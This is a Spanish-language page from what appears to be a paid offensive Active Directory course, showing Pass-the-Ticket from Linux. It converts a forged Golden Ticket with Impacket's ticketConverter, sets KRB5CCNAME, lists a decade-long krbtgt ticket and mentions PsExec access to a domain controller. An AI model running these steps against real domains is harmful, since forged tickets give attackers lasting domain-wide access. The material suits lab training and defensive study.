search
Comprar cursoYouTubeTwitterLinkedIn

PTT en Linux

circle-info

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiuarrow-up-right. ¡Te esperamos para empezar este viaje juntos!

En entornos Linux/Unix, el proceso implica convertir el ticket a un formato compatible (.ccache). Herramientas como ticketConverter.py de Impacket son esenciales en este proceso. Una vez convertido, se puede utilizar kinit con el archivo .ccache para autenticarse en el entorno Linux/Unix.

Teniendo en cuenta lo explicado en Golden Ticket tradicional utilizando Mimikatz

kali@kali=> impacket-ticketConverter evil.tck evil.ccache                                                     
Impacket v0.11.0 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done

Despues de pasar el ticket a CCACHE, debemos establecer la siguiente variable de entorno apuntando a la ruta del archivo en donde se aloja el ticket CCACHE:

export KRB5CCNAME=/home/kali/Desktop/CPAD/evil.ccache

Y finalmente podemos validar la configuracion previa con:

kali@kali=> klist
Ticket cache: FILE:/home/kali/Desktop/CPAD/evil.ccache
Default principal: [email protected]

Valid starting       Expires              Service principal
11/23/2023 09:40:54  11/20/2033 09:40:54  krbtgt/[email protected]
	renew until 11/20/2033 09:40:54

Y para validar que se cargaron nuestros permisos basado el ticket podemos ejecutar el siguiente comando:

En la evidencia previa, estamos usando impacket con el parametro -k podemos autenticarnos por PSEXEC sobre el First-DC.

AnteriorPass The TicketSiguientePTT en Windows

Última actualización